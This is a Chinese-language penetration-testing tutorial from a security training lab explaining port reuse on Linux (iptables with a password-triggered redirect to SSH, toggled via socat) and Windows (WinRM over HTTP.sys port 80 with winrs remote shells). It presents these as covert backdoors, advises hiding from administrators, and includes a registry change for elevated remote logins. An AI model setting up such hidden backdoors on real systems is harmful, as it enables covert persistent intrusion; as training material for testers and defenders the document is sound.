出品|MS08067實驗室(www.ms08067.com)
本文作者:Spark(Ms08067內網安全小組成員)
定義:端口復用是指不同的應用程序使用相同端口進行通訊。
場景:內網滲透中,搭建隧道時,服務器僅允許指定的端口對外開放。利用端口復用可以將3389或22等端口轉發到如80端口上,以便外部連接。
示意圖:
功能:
- 端口復用可以更好地隱蔽攻擊行為,提高生存幾率。
- 端口復用有時也用作通道后門。
特點:
- 端口復用在系統已開放的端口上進行通訊,只對輸入的信息進行字符匹配,不對網絡數據進行任何攔截、復制類操作,所以對網絡數據的傳輸性能幾乎沒有影響。
一、Linux端口復用
1.概述
使用iptables實現端口復用,使用socat進行連接。
使用該方法開啟的端口復用為有限的端口復用,復用后端口正常業務會受影響,僅用於后門留存,或者臨時使用,不建議長期使用。
2.原理
(1) iptables
iptables是linux下的防火牆管理工具。
- 真正實現防火牆功能的是netfilter,它是linux內核中實現包過濾的核心。
- 免費。
- 可實現封包過濾、封包重定向和網路地址轉換(NAT)等功能。
(2) 數據通過防火牆流程
(3) 鏈
鏈是一些按順序排列的規則的列表。
- PREROUTING鏈——對數據包作路由選擇前應用此鏈中的規則(所有的數據包進來的時侯都先由這個鏈處理)
- INPUT鏈——進來的數據包應用此規則鏈中的策略
- OUTPUT鏈——外出的數據包應用此規則鏈中的策略
- FORWARD鏈——轉發數據包時應用此規則鏈中的策略
- POSTROUTING鏈——對數據包作路由選擇后應用此鏈中的規則(所有的數據包出來的時侯都先由這個鏈處理)
(4) 表
表由一組預先定義的鏈組成。
- filter表——用於存放所有與防火牆相關操作的默認表。通常用於過濾數據包。
- nat表——用於網絡地址轉換
- mangle表——用於處理數據包
- raw表——用於配置數據包,raw 中的數據包不會被系統跟蹤。
(5) 鏈和表的關系及順序
- PREROUTING: raw -> mangle -> nat
- INPUT: mangle -> filter
- FORWARD: mangle -> filter
- OUTPUT: raw -> mangle -> nat -> filter
- POSTROUTING: mangle -> nat
(6) 表和鏈的關系
實際使用中是從表作為操作入口:
- raw 表:PREROUTING,OUTPUT
- mangle表:PREROUTING,INPUT,FORWARD,OUTPUT,POSTROUTING
- nat 表:PREROUTING,OUTPUT,POSTROUTING
- filter 表:INPUT,FORWARD,OUTPUT
(7) 添加規則
iptables ‐t 表名 <‐A/I/D/R> 規則鏈名 [規則號] <‐i/o 網卡名> ‐p 協議名 <‐s 源ip、源子網> ‐‐sport 源端口 <‐d 目標ip/目標子網> ‐‐dport 目標端口 ‐j 動作
(8) socat
Socat是linux下的一個多功能的網絡工具,名字來由是socket cat。其功能與netcat類似,可以看做是netcat的加強版。
3.指令速查
(1) 配置端口復用及開關規則
- 目標主機上創建新轉發鏈
- 設置復用規則(設置轉發規則)
- 設置開關規則(接受約定字符后規則生效/失效)
- 約定字符盡量復雜
# 新建端口復用鏈
iptables -t nat -N LETMEIN
# 端口復用規則
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 開啟端口復用開關
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 關閉端口復用開關
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
# 開啟端口復用
iptables -t nat -A PREROUTING -p tcp --dport 8000 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
(2) 使用socat連接
使用socat發送約定口令至目標主機打開端口復用開關
echo threathuntercoming | socat ‐ tcp:192.168.245.135:8000
使用完畢后,發送約定關閉口令至目標主機目標端口關閉端口復用
echo threathunterleaving | socat ‐ tcp:192.168.245.135:8000
4.實驗
- Target:Ubuntu 16.04 x64
- IP:192.168.245.135
- 開啟8000端口的web服務
- 開啟22端口
配置端口復用:
- Attacker:Kali 2020 x64
- IP:192.168.245.130
使用socat連接:
此時ssh可以通過8000訪問,但是8000端口的正常web業務受到影響:
使用socat斷開連接,ssh無法再連接,但是8000端口回復正常:
5.參考鏈接
二、Windows端口復用
1.概述
使用HTTP.sys中的Net.tcp Port Sharing服務,配合WinRM實現端口復用。
- 優點:HTTP.sys為windows原生機制,WinRM為windows自帶功能,動作較小,不易觸發主動防御。
- 需要管理員權限。
2.原理
(1) HTTP.sys
HTTP.sys是Microsoft Windows處理HTTP請求的內核驅動程序。
- 為了優化IIS服務器性能
- 從IIS6.0引入(即Windows Server 2003及以上版本)
- IIS服務進程依賴HTTP.sys
HTTP.sys監聽HTTP流量,然后根據URL注冊的情況去分發,以實現多個進程在同一個端口監聽HTTP流量。微軟公開了HTTP Server API庫,Httpcfg、Netsh等都是基於它的。
整個過程描述如下:
Step 1.注冊:IIS或其他應用使用HTTP Server API時,需要先在HTTP.sys上面注冊url prefix,以監聽請求路徑。
Step 2.路由:HTTP.sys獲取到request請求,並分發這個請求給注冊當前url對應的應用。
(2) Net.tcp Port Sharing
Net.tcp Port Sharing服務是WCF(Windows Communication Foundation,微軟的一個框架)中的一個新系統組件,這個服務會開啟Net.tcp端口共享功能以達到在用戶的不同進程之間實現端口共享。這個機制的最終是在HTTP.sys中實現的。目前將許多不同HTTP應用程序的流量復用到單個TCP端口上的HTTP.sys模型已經成為windows平台上的標准配置。
在以前的web應用中,一個web應用綁定一個端口,若有其他應用則需要綁定其他的端口才能實現監聽。如下圖所示,Web Application 1綁定了80端口后,Web Application 2再去綁定80端口會出錯。
現在使用微軟提供的NET.tcp Port Sharing服務,只要遵循相關的開發接口規則,就可以實現不同的應用共享相同的web服務器端口。如下圖中Web Application 1和Web Application 2同時綁定在80端口。
(3) WinRM
WinRM全稱是Windows Remote Management,是微軟服務器硬件管理功能的一部分,能夠對本地或遠程的服務器進行管理。WinRM服務能夠讓管理員遠程登錄windows操作系統,獲得一個類似telnet的交互式命令行shell,而底層通訊協議使用的正是HTTP。
事實上,WinRM已經在HTTP.sys上注冊了名為wsman的url前綴,默認監聽端口5985。因此,在安裝了IIS的邊界windows服務器上,開啟WinRM服務后修改默認listener端口為80或新增一個80端口的listener即可實現端口復用,可以直接通過80端口登錄windows服務器。
3.指令速查
查詢當前注冊url前綴:
netsh http show servicestate
(1) 開啟winrm服務
Windows 2012及以上:winrm默認啟動並監聽了5985端口。
Windows 2008:需要手動啟動winrm。
winrm quickconfig ‐q
(2) 增加80端口復用
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
(3) 更改winrm為80端口
- 默認5985端口開啟,不需要更改端口。
- 默認5985端口不開啟,則更改winrm為80端口,否則會因端口改變而引起管理員關注。
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
(4) 攻擊機也需要啟動winrm並設置信任連接
# 啟動winrm
winrm quickconfig ‐q
# 設置信任主機地址
winrm set winrm/config/Client @{TrustedHosts="*"}
(5) 連接使用winrs命令接口連接遠程winrm服務執行命令,並返回結果
winrs,Windows Remote Shell,windows遠程shell,是winrm的一個組件。
winrs ‐r:http://www.aabbcc.com ‐u:administrator ‐p:Password [命令]
4.實驗
- Target:Windows Server 2008 R2 x64
- IP:192.168.245.133
開啟IIS服務。
先看一下當前注冊的url前綴:
啟動winrm:
再看一下注冊的url前綴,發現winrm已注冊:
看一下端口情況:
增加80端口復用:
更改winrm為80端口:
再看一下端口情況,發現5985端口已關閉:
- Attacker:Windows Server 2008 R2 x64
- IP:192.168.245.134
啟動winrm並設置信任主機地址:
使用winrs遠程執行命令:
執行cmd命令可獲取交互式shell:
此時IIS的正常服務並未受到影響:
5.提升權限(未親測)
WinRM服務也是受UAC影響的,所以本地管理員用戶組里面只有administrator可以登錄,其他管理員用戶是沒法遠程登錄WinRM的。要允許本地管理員組的其他用戶登錄WinRM,需要修改注冊表設置。
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
修改后,普通管理員登錄后也是高權限。
6.Hash登錄(未親測)
系統自帶的winrs命令登錄時需要使用明文賬號密碼,那很多場景下尤其是windows 2012以后,經常只能抓取到本地用戶的hash,無法輕易獲得明文密碼。因此需要實現一款支持使用NTLM hash登錄的客戶端,使用python來實現不難。
7.參考鏈接
轉載請聯系作者並注明出處!
Ms08067安全實驗室專注於網絡安全知識的普及和培訓。團隊已出版《Web安全攻防:滲透測試實戰指南》,《內網安全攻防:滲透測試實戰指南》,《Python安全攻防:滲透測試實戰指南》,《Java代碼安全審計(入門篇)》等書籍。
團隊公眾號定期分享關於CTF靶場、內網滲透、APT方面技術干貨,從零開始、以實戰落地為主,致力於做一個實用的干貨分享型公眾號。
官方網站:https://www.ms08067.com/
掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群,內部微信群永久有效!
